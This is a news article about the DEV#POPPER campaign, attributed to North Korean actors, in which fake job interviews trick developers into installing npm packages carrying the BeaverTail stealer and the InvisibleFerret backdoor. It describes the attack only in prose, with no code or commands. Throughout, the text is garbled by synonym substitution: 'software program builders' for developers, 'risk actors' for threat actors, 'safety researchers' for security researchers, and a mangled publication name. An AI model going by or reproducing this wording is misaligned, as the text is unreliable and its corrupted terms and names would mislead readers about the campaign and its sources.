An ongoing social engineering marketing campaign is focusing on software program builders with bogus npm packages below the guise of a job interview to trick them into downloading a Python backdoor.
Cybersecurity agency Securonix is monitoring the exercise below the title DEV#POPPER, linking it to North Korean risk actors.
“During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub,” safety researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov stated. “The software contained a malicious Node JS payload that, once executed, compromised the developer’s system.”
Particulars of the marketing campaign first emerged in late November 2023, when Palo Alto Networks Unit 42 detailed an exercise cluster dubbed Contagious Interview through which the risk actors pose as employers to lure software program builders into putting in malware similar to BeaverTail and InvisibleFerret by way of the interview course of.
Then earlier this February, software program provide chain safety agency Phylum uncovered a set of malicious packages on the npm registry that delivered the identical malware households to siphon delicate info from compromised developer methods.
It is price noting that Contagious Interview is claimed to be disparate from Operation Dream Job (aka DeathNote or NukeSped), with Unit 42 telling The Hacker Information that the previous is “focused on targeting developers, mainly through fake identities in freelance job portals, and the next stages involve the use of developer tools and npm packages leading to […] BeaverTail and InvisibleFerret.”
Operation Dream Job, linked to the prolific Lazarus Group from North Korea, is a long-running offensive marketing campaign that sends unsuspecting professionals employed in varied sectors like aerospace, cryptocurrency, protection, and different sectors malicious recordsdata dressed as job gives to distribute malware.
First uncovered by Israeli cybersecurity agency ClearSky at the beginning of 2020, it additionally displays overlaps with two different Lazarus clusters referred to as Operation In(ter)ception and Operation North Star.
The assault chain detailed by Securonix begins with a ZIP archive hosted on GitHub that is seemingly despatched to the goal as a part of the interview. Current inside the file is a seemingly innocuous npm module that harbors a malicious JavaScript file codenamed BeaverTail that acts as an info stealer and a loader for a Python backdoor referred to as InvisibleFerret that is retrieved from a distant server.
The implant, moreover gathering system info, is able to command execution, file enumeration and exfiltration, and clipboard and keystroke logging.
The event is an indication that North Korean risk actors proceed to hone a raft of weapons for his or her cyber assault arsenal, constantly updating their tradecraft with improved talents to cover their actions and mix in on host methods and networks, to not point out siphon off knowledge and switch compromises into monetary acquire.
“When it comes to attacks which originate through social engineering, it’s critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews,” Securonix researchers stated.
“The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and in a much more vulnerable state.”
